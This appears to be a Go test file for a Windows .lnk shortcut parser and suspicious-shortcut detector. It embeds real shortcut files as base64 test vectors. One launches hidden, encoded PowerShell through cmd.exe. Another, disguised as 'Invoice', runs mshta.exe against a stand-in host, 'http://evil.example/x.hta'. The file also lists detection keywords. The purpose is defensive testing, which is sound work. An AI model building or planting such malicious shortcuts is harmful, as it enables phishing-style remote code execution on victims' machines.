package lnk

import (
	"encoding/base64"
	"testing"
)

// Vectors are real .lnk files generated by pylnk3 and cross-decoded with
// LnkParse3 (the venv oracle); the asserted fields match LnkParse3's output.
//
//	evilLNK   — cmd.exe, args "/c powershell -nop -w hidden -enc SQBFAFgA"
//	benignLNK — notepad.exe, no arguments
//	mshtaLNK  — mshta.exe, name "Invoice", args "http://evil.example/x.hta"
const (
	evilLNK   = "TAAAAAEUAgAAAAAAwAAAAAAAAEbhAQAAAAAAAAAcs05i+9wBAByzTmL73AEAHLNOYvvcAQAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAOcAFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAAAAAAAAAAAAAAPAAyAAAAAADOXGQjEABXaW5kb3dzACYAAwAEAO++zlxkI85cZCMUAAAAVwBpAG4AZABvAHcAcwAAABYAQAAyAAAAAADOXGQjEABTeXN0ZW0zMgAAKAADAAQA777OXGQjzlxkIxQAAABTAHkAcwB0AGUAbQAzADIAAAAYADwAMgAAAAAAzlxkIxAAY21kLmV4ZQAmAAMABADvvs5cZCPOXGQjFAAAAGMAbQBkAC4AZQB4AGUAAAAWAAAAKgAvAGMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAG4AYwAgAFMAUQBCAEYAQQBGAGcAQQAfAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABzAGgAZQBsAGwAMwAyAC4AZABsAGwAAAAAAA=="
	benignLNK = "TAAAAAEUAgAAAAAAwAAAAAAAAEaBAQAAAAAAAIAo/F9i+9wBgCj8X2L73AGAKPxfYvvcAQAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAALMAFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAAAAAAAAAAAAAAPAAyAAAAAADOXIUjEABXaW5kb3dzACYAAwAEAO++zlyFI85chSMUAAAAVwBpAG4AZABvAHcAcwAAABYASAAyAAAAAADOXIUjEABub3RlcGFkLmV4ZQAuAAMABADvvs5chSPOXIUjFAAAAG4AbwB0AGUAcABhAGQALgBlAHgAZQAAABoAAAAAAAAA"
	mshtaLNK  = "TAAAAAEUAgAAAAAAwAAAAAAAAEblAQAAAAAAAIAo/F9i+9wBgCj8X2L73AGAKPxfYvvcAQAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAO0AFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAAAAAAAAAAAAAAPAAyAAAAAADOXIUjEABXaW5kb3dzACYAAwAEAO++zlyFI85chSMUAAAAVwBpAG4AZABvAHcAcwAAABYAQAAyAAAAAADOXIUjEABTeXN0ZW0zMgAAKAADAAQA777OXIUjzlyFIxQAAABTAHkAcwB0AGUAbQAzADIAAAAYAEIAMgAAAAAAzlyFIxAAbXNodGEuZXhlACoAAwAEAO++zlyFI85chSMUAAAAbQBzAGgAdABhAC4AZQB4AGUAAAAYAAAABwBJAG4AdgBvAGkAYwBlABkAaAB0AHQAcAA6AC8ALwBlAHYAaQBsAC4AZQB4AGEAbQBwAGwAZQAvAHgALgBoAHQAYQAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABpAG0AYQBnAGUAcgBlAHMALgBkAGwAbAAAAAAA"
)

func mustB64(t *testing.T, s string) []byte {
	t.Helper()
	b, err := base64.StdEncoding.DecodeString(s)
	if err != nil {
		t.Fatalf("base64: %v", err)
	}
	return b
}

func hasFlag(r *Result, name string) bool {
	for _, f := range r.LinkFlags {
		if f == name {
			return true
		}
	}
	return false
}

func TestDecode_EvilPowerShell(t *testing.T) {
	r, err := Decode(mustB64(t, evilLNK))
	if err != nil {
		t.Fatalf("Decode: %v", err)
	}
	if r.Arguments != "/c powershell -nop -w hidden -enc SQBFAFgA" {
		t.Errorf("arguments = %q", r.Arguments)
	}
	if r.IconLocation != `C:\Windows\System32\shell32.dll` {
		t.Errorf("icon = %q", r.IconLocation)
	}
	if r.ShowCommand != "SW_SHOWNORMAL" {
		t.Errorf("show = %q", r.ShowCommand)
	}
	for _, f := range []string{"HasLinkTargetIDList", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo"} {
		if !hasFlag(r, f) {
			t.Errorf("missing flag %s (got %v)", f, r.LinkFlags)
		}
	}
	if !r.Suspicious {
		t.Fatal("expected Suspicious=true")
	}
	for _, want := range []string{"powershell", "-enc", "-nop", "hidden"} {
		if !contains(r.SuspiciousReasons, want) {
			t.Errorf("reasons %v missing %q", r.SuspiciousReasons, want)
		}
	}
}

func TestDecode_BenignNotepad(t *testing.T) {
	r, err := Decode(mustB64(t, benignLNK))
	if err != nil {
		t.Fatalf("Decode: %v", err)
	}
	if r.Arguments != "" || r.Suspicious || len(r.SuspiciousReasons) != 0 {
		t.Errorf("benign flagged: args=%q susp=%v reasons=%v", r.Arguments, r.Suspicious, r.SuspiciousReasons)
	}
	if !hasFlag(r, "IsUnicode") || hasFlag(r, "HasArguments") {
		t.Errorf("flags = %v", r.LinkFlags)
	}
}

func TestDecode_MshtaURL(t *testing.T) {
	r, err := Decode(mustB64(t, mshtaLNK))
	if err != nil {
		t.Fatalf("Decode: %v", err)
	}
	if r.Name != "Invoice" {
		t.Errorf("name = %q, want Invoice", r.Name)
	}
	if r.Arguments != "http://evil.example/x.hta" {
		t.Errorf("arguments = %q", r.Arguments)
	}
	if r.IconLocation != `C:\Windows\System32\imageres.dll` {
		t.Errorf("icon = %q", r.IconLocation)
	}
	if !r.Suspicious {
		t.Fatal("expected Suspicious=true")
	}
	// The target (mshta.exe) lives in the shell-item IDList, which is not
	// decoded — the http:// URL + .hta in the arguments are the visible signal.
	for _, want := range []string{"http://", ".hta"} {
		if !contains(r.SuspiciousReasons, want) {
			t.Errorf("reasons %v missing %q", r.SuspiciousReasons, want)
		}
	}
}

func TestDecode_Errors(t *testing.T) {
	cases := map[string][]byte{
		"empty":      {},
		"short":      make([]byte, 10),
		"bad header": append([]byte{0x00, 0x00, 0x00, 0x00}, make([]byte, 80)...),
		"bad clsid":  append([]byte{0x4C, 0x00, 0x00, 0x00}, make([]byte, 80)...),
	}
	for name, in := range cases {
		if _, err := Decode(in); err == nil {
			t.Errorf("%s: expected error, got nil", name)
		}
	}
}

func contains(xs []string, s string) bool {
	for _, x := range xs {
		if x == s {
			return true
		}
	}
	return false
}

func FuzzDecode(f *testing.F) {
	for _, s := range []string{evilLNK, benignLNK, mshtaLNK} {
		if b, err := base64.StdEncoding.DecodeString(s); err == nil {
			f.Add(b)
		}
	}
	f.Add([]byte{})
	f.Fuzz(func(_ *testing.T, in []byte) {
		_, _ = Decode(in)
	})
}
